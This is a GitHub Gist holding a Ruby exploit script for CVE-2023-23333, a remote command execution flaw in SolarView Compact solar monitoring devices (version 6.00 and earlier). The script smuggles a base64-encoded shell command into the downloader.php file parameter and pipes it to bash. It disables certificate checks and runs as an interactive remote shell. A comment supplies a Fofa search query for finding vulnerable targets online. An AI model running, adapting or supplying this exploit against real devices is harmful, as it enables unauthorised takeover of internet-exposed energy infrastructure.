Skip to content

Instantly share code, notes, and snippets.

@komodoooo
Created July 25, 2023 09:15
Show Gist options
  • Save komodoooo/046a5000af5a0e092dc0dfacdbbddd2f to your computer and use it in GitHub Desktop.
Save komodoooo/046a5000af5a0e092dc0dfacdbbddd2f to your computer and use it in GitHub Desktop.
CVE-2023-23333 exploit
require 'http'
require 'openssl'
puts """
CVE-2023-23333
SolarView Compact <=6.00 RCE exploit
By komodo\n
"""
=begin
Fofa query to search vulnerable targets:
body="SolarView Compact" && title="Top"
=end
def b64url(text)
return [text].pack("m").gsub(/[\n\r\t=]/,"")
end
def main(url, cmd)
url.delete_suffix!("/") unless url[-1..-1] != "/"
@ctx = OpenSSL::SSL::SSLContext.new()
@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
puts "Executing command..."
r=HTTP.use({normalize_uri:{
normalizer:->(uri){HTTP::URI.parse(uri)},},
}).get("#{url}/downloader.php?file=;echo%20#{b64url(cmd)}|base64%20-d|bash%00.zip",
:ssl_context=>@ctx)
sosa=r.body.to_s
if sosa.include?("rows exported.")
puts "Command result:\n\n"
puts sosa[sosa.index("/tmp/history.csv")+0x10..sosa.index("<!DOCTYPE")-1].strip()
else
puts "\rNot Vulnerable"
end
end
begin
print"Base URL: "
a=gets.chomp
while true
print "\n$ "
main(a,gets.chomp)
end
rescue => e
abort(e.to_s)
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment